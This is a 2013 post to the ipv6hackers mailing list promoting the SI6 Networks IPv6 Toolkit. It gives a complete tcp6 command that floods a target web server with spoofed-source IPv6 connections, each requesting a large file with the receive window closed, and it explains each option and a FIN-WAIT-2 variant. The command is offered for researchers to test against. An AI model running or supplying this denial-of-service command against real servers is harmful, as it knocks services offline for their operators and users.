[ipv6hackers] IPv6 Toolkit v1.4b: Give it a try! ;-)
Fernando Gont
fgont at si6networks.com
Tue Aug 27 14:11:24 CEST 2013
On 08/22/2013 02:14 PM, Loganaden Velvindron wrote:
>> * You might be interested in trying the new features of the tcp6 tool
>> (see Examples #3 and #4 of the tcp6 manpage). -- If anyone wants
>> additional hints about other possible DoS attacks, just ask. :-)
>
> I would be interested to know more about those please :-)
sudo ./tcp6 -i vboxnet0 -d fc00:1::1 -a 80 -L -s fc00:2::/64 --tcp-flags
auto --data "GET /big-file HTTP/1.0\r\nHost: www.example.com\r\n\r\n"
--window-mode close -l --flood-ports 64000 -l --tcp-win 65000 -r 500pps
Where:
-d fc00:1::1 is target node
-s fc00:2::/64 is a prefix you can spoof from
--data "GET /big-file HTTP/1.0\r\nHost: www.example.com\r\n\r\n" :
speifies a rather big file on the target web server
-r 500pps : does rate limit (vary at your own will)
This will lead to lts of connections with at least 65K bytes in the send
queue, that remain in the ESTABLISHED state.
You may also add the option: -close-mode FIN-WAIT-2
such that connections remain in the FIN-WAIT-2 state (some servers may
keep such connections forever).
Try and report. :-)
I'll provide a more comprehensive explanation later this week.
Thanks!
Best regards,
--
Fernando Gont
SI6 Networks
e-mail: fgont at si6networks.com
PGP Fingerprint: 6666 31C6 D484 63B2 8FB1 E3C4 AE25 0D55 1D4E 7492
More information about the Ipv6hackers
mailing list